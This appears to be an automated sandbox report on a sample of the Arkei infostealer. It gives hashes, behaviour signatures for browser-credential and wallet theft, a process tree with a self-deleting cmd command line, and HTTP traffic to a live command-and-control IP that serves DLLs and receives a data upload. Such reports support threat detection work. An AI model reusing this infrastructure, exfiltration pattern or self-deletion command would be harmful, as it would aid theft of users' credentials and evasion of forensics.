Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/08/2024, 11:25 UTC

General

  • Target

    311476e365e80b02b44b55ddcf5865c4.exe

  • Size

    68KB

  • MD5

    311476e365e80b02b44b55ddcf5865c4

  • SHA1

    d6fd497eb25234c77b2e8f672e292b5f9f760550

  • SHA256

    a1e0a1c53824bb1d9d0adcaa6a8e8e2f5bef673b0981807a5775a182f28fe235

  • SHA512

    70ff8f50b54df097a456689eed6c6218b2bb9d8c9e9f46c7b6e5a9dc5060eb331ba36f13cde252758b049f5b4ac498abf2d2b5c256edaf5dd7c777274e31b231

  • SSDEEP

    1536:x2vMlMpCPJeGnyJDBld71oCe10yf0cCGMyo+JM4Z8L6Q3hs1:x2vMlMp8JeoyJDBlZycdGMyoYM+/D

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Downloads MZ/PE file
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe
    "C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe" & exit
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2672

Network

  • flag-gb
    GET
    http://104.194.151.11/AP.php
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /AP.php HTTP/1.1
    Host: 104.194.151.11
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:58 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Set-Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 12
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-gb
    GET
    http://104.194.151.11/sqlite3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /sqlite3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:58 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "9d9d8-6200e4e88720f"
    Accept-Ranges: bytes
    Content-Length: 645592
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/freebl3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /freebl3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "519d0-6200e4e818494"
    Accept-Ranges: bytes
    Content-Length: 334288
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/mozglue.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /mozglue.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "217d0-6200e4e840d08"
    Accept-Ranges: bytes
    Content-Length: 137168
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/msvcp140.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /msvcp140.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "6b738-6200e4e857852"
    Accept-Ranges: bytes
    Content-Length: 440120
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/nss3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /nss3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "1303d0-6200e4e85fd23"
    Accept-Ranges: bytes
    Content-Length: 1246160
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/softokn3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /softokn3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:26:00 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "235d0-6200e4e86cc2d"
    Accept-Ranges: bytes
    Content-Length: 144848
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/vcruntime140.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /vcruntime140.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:26:00 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "14748-6200e4e8856b7"
    Accept-Ranges: bytes
    Content-Length: 83784
    Content-Type: application/x-msdos-program
  • flag-gb
    POST
    http://104.194.151.11/AP.php
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    POST /AP.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----I5P8GD2V3W47YUS2
    Host: 104.194.151.11
    Content-Length: 46508
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:26:00 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 0
    Keep-Alive: timeout=5, max=92
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • 104.194.151.11:80
    http://104.194.151.11/AP.php
    http
    311476e365e80b02b44b55ddcf5865c4.exe
    113.5kB
    3.1MB
    1392
    2259

    HTTP Request

    GET http://104.194.151.11/AP.php

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/sqlite3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/freebl3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/mozglue.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/msvcp140.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/nss3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/softokn3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/vcruntime140.dll

    HTTP Response

    200

    HTTP Request

    POST http://104.194.151.11/AP.php

    HTTP Response

    200
MITRE ATT&CK Enterprise v15

Downloads

  • \ProgramData\mozglue.dll

    Filesize

    133KB

    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

  • \ProgramData\nss3.dll

    Filesize

    1.2MB

    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

  • \ProgramData\sqlite3.dll

    Filesize

    630KB

    MD5

    e477a96c8f2b18d6b5c27bde49c990bf

    SHA1

    e980c9bf41330d1e5bd04556db4646a0210f7409

    SHA256

    16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

    SHA512

    335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

  • memory/836-0-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/836-1-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/836-53-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB
